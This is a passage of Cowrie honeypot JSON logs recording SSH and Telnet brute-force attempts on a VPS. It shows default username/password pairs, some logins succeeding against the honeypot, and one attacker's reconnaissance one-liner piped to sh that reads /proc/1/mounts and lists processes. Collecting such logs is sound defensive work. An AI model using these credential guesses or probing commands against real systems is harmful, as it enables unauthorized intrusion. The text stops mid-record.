{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:28.404499Z","src_ip":"47.155.114.45","session":"8edc8745080e"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":34676,"dst_ip":"1.2.3.4","dst_port":22,"session":"36531a614f3b","protocol":"ssh","message":"New connection: 47.155.114.45:34676 (1.2.3.4:22) [session: 36531a614f3b]","sensor":"my-vps","timestamp":"2025-08-26T07:57:28.575444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-26T07:57:28.576324Z","src_ip":"47.155.114.45","session":"36531a614f3b"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:28.748227Z","src_ip":"47.155.114.45","session":"36531a614f3b"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-26T07:57:29.307763Z","src_ip":"47.155.114.45","session":"36531a614f3b"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:30.482616Z","src_ip":"47.155.114.45","session":"36531a614f3b"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":37376,"dst_ip":"1.2.3.4","dst_port":22,"session":"ff320721bcbd","protocol":"ssh","message":"New connection: 47.155.114.45:37376 (1.2.3.4:22) [session: ff320721bcbd]","sensor":"my-vps","timestamp":"2025-08-26T07:57:30.647427Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-26T07:57:30.648180Z","src_ip":"47.155.114.45","session":"ff320721bcbd"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:30.816099Z","src_ip":"47.155.114.45","session":"ff320721bcbd"}
{"eventid":"cowrie.login.failed","username":"orangepi","password":"orangepi","message":"login attempt [orangepi/orangepi] failed","sensor":"my-vps","timestamp":"2025-08-26T07:57:31.369132Z","src_ip":"47.155.114.45","session":"ff320721bcbd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:32.540148Z","src_ip":"47.155.114.45","session":"ff320721bcbd"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":40156,"dst_ip":"1.2.3.4","dst_port":22,"session":"3c9e7e254f9c","protocol":"ssh","message":"New connection: 47.155.114.45:40156 (1.2.3.4:22) [session: 3c9e7e254f9c]","sensor":"my-vps","timestamp":"2025-08-26T07:57:32.706153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-26T07:57:32.706744Z","src_ip":"47.155.114.45","session":"3c9e7e254f9c"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:32.874304Z","src_ip":"47.155.114.45","session":"3c9e7e254f9c"}
{"eventid":"cowrie.login.failed","username":"support","password":"support","message":"login attempt [support/support] failed","sensor":"my-vps","timestamp":"2025-08-26T07:57:33.437979Z","src_ip":"47.155.114.45","session":"3c9e7e254f9c"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:34.608387Z","src_ip":"47.155.114.45","session":"3c9e7e254f9c"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":47898,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d3b425b7d2a","protocol":"ssh","message":"New connection: 47.155.114.45:47898 (1.2.3.4:22) [session: 1d3b425b7d2a]","sensor":"my-vps","timestamp":"2025-08-26T07:57:34.775226Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-26T07:57:34.776184Z","src_ip":"47.155.114.45","session":"1d3b425b7d2a"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:34.944487Z","src_ip":"47.155.114.45","session":"1d3b425b7d2a"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"ubnt","message":"login attempt [ubnt/ubnt] failed","sensor":"my-vps","timestamp":"2025-08-26T07:57:35.494630Z","src_ip":"47.155.114.45","session":"1d3b425b7d2a"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:36.664354Z","src_ip":"47.155.114.45","session":"1d3b425b7d2a"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":50602,"dst_ip":"1.2.3.4","dst_port":22,"session":"06795fac986d","protocol":"ssh","message":"New connection: 47.155.114.45:50602 (1.2.3.4:22) [session: 06795fac986d]","sensor":"my-vps","timestamp":"2025-08-26T07:57:36.831017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-26T07:57:36.832012Z","src_ip":"47.155.114.45","session":"06795fac986d"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:37.000260Z","src_ip":"47.155.114.45","session":"06795fac986d"}
{"eventid":"cowrie.login.failed","username":"user","password":"user","message":"login attempt [user/user] failed","sensor":"my-vps","timestamp":"2025-08-26T07:57:37.544588Z","src_ip":"47.155.114.45","session":"06795fac986d"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:38.716170Z","src_ip":"47.155.114.45","session":"06795fac986d"}
{"eventid":"cowrie.session.connect","src_ip":"47.155.114.45","src_port":53372,"dst_ip":"1.2.3.4","dst_port":22,"session":"9840085e77ae","protocol":"ssh","message":"New connection: 47.155.114.45:53372 (1.2.3.4:22) [session: 9840085e77ae]","sensor":"my-vps","timestamp":"2025-08-26T07:57:38.889444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_10.0","message":"Remote SSH version: SSH-2.0-OpenSSH_10.0","sensor":"my-vps","timestamp":"2025-08-26T07:57:38.890636Z","src_ip":"47.155.114.45","session":"9840085e77ae"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:39.062150Z","src_ip":"47.155.114.45","session":"9840085e77ae"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:57:39.785891Z","src_ip":"47.155.114.45","session":"9840085e77ae"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:39.958622Z","src_ip":"47.155.114.45","session":"9840085e77ae"}
{"eventid":"cowrie.session.connect","src_ip":"167.160.161.37","src_port":47378,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c7342e973eb","protocol":"ssh","message":"New connection: 167.160.161.37:47378 (1.2.3.4:22) [session: 2c7342e973eb]","sensor":"my-vps","timestamp":"2025-08-26T07:57:42.858114Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T07:57:42.859616Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.client.kex","hassh":"c118de82e19e5384f50f9bfd36c1a5dc","hasshAlgorithms":"mlkem768x25519-sha256,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["mlkem768x25519-sha256","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: c118de82e19e5384f50f9bfd36c1a5dc","sensor":"my-vps","timestamp":"2025-08-26T07:57:42.906929Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-26T07:57:43.205234Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.client.size","width":40,"height":80,"message":"Terminal Size: 40 80","sensor":"my-vps","timestamp":"2025-08-26T07:57:43.358693Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T07:57:43.406781Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.command.input","input":"echo \"cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\" | sh","message":"CMD: echo \"cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\" | sh","sensor":"my-vps","timestamp":"2025-08-26T07:57:43.458046Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.command.input","input":"cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\n","message":"CMD: cat /proc/1/mounts && ls /proc/1/; curl2; ps aux; ps\n","sensor":"my-vps","timestamp":"2025-08-26T07:57:43.459727Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.command.failed","input":"curl2","message":"Command not found: curl2","sensor":"my-vps","timestamp":"2025-08-26T07:57:43.461579Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.command.input","input":"","message":"CMD: ","sensor":"my-vps","timestamp":"2025-08-26T07:57:43.468832Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/9269a7f1bb32625f5b43fb851d2d3d6be7475e32b4303dea7359e723750b90c5","size":3931,"shasum":"9269a7f1bb32625f5b43fb851d2d3d6be7475e32b4303dea7359e723750b90c5","duplicate":true,"duration":"5.1","message":"Closing TTY Log: var/lib/cowrie/tty/9269a7f1bb32625f5b43fb851d2d3d6be7475e32b4303dea7359e723750b90c5 after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:48.498727Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T07:57:48.500030Z","src_ip":"167.160.161.37","session":"2c7342e973eb"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54504,"dst_ip":"1.2.3.4","dst_port":22,"session":"20ebe5ff324c","protocol":"ssh","message":"New connection: 217.72.205.35:54504 (1.2.3.4:22) [session: 20ebe5ff324c]","sensor":"my-vps","timestamp":"2025-08-26T08:00:22.917188Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:00:22.924142Z","src_ip":"217.72.205.35","session":"20ebe5ff324c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39900,"dst_ip":"1.2.3.4","dst_port":23,"session":"3822e1f63a3f","protocol":"telnet","message":"New connection: 212.227.125.160:39900 (1.2.3.4:23) [session: 3822e1f63a3f]","sensor":"my-vps","timestamp":"2025-08-26T08:00:37.615327Z"}
{"eventid":"cowrie.session.closed","duration":1.4514992237091064,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:00:39.066756Z","src_ip":"212.227.125.160","session":"3822e1f63a3f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39902,"dst_ip":"1.2.3.4","dst_port":23,"session":"5e7fb2f88869","protocol":"telnet","message":"New connection: 212.227.125.160:39902 (1.2.3.4:23) [session: 5e7fb2f88869]","sensor":"my-vps","timestamp":"2025-08-26T08:00:39.229136Z"}
{"eventid":"cowrie.session.closed","duration":5.727720737457275,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:00:44.956787Z","src_ip":"212.227.125.160","session":"5e7fb2f88869"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39914,"dst_ip":"1.2.3.4","dst_port":23,"session":"d0cbc84519aa","protocol":"telnet","message":"New connection: 212.227.125.160:39914 (1.2.3.4:23) [session: d0cbc84519aa]","sensor":"my-vps","timestamp":"2025-08-26T08:00:45.117035Z"}
{"eventid":"cowrie.login.success","username":"root","password":"icatch99","message":"login attempt [root/icatch99] succeeded","sensor":"my-vps","timestamp":"2025-08-26T08:00:46.993618Z","src_ip":"212.227.125.160","session":"d0cbc84519aa"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T08:00:47.066593Z","src_ip":"212.227.125.160","session":"d0cbc84519aa"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":432,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"3.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 3.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:00:50.053499Z","src_ip":"212.227.125.160","session":"d0cbc84519aa"}
{"eventid":"cowrie.session.closed","duration":4.942956924438477,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-26T08:00:50.058576Z","src_ip":"212.227.125.160","session":"d0cbc84519aa"}
{"eventid":"cowrie.session.connect","src_ip":"123.58.212.133","src_port":37440,"dst_ip":"1.2.3.4","dst_port":22,"session":"c42dc692a680","protocol":"ssh","message":"New connection: 123.58.212.133:37440 (1.2.3.4:22) [session: c42dc692a680]","sensor":"my-vps","timestamp":"2025-08-26T08:04:21.497521Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T08:04:21.500790Z","src_ip":"123.58.212.133","session":"c42dc692a680"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes2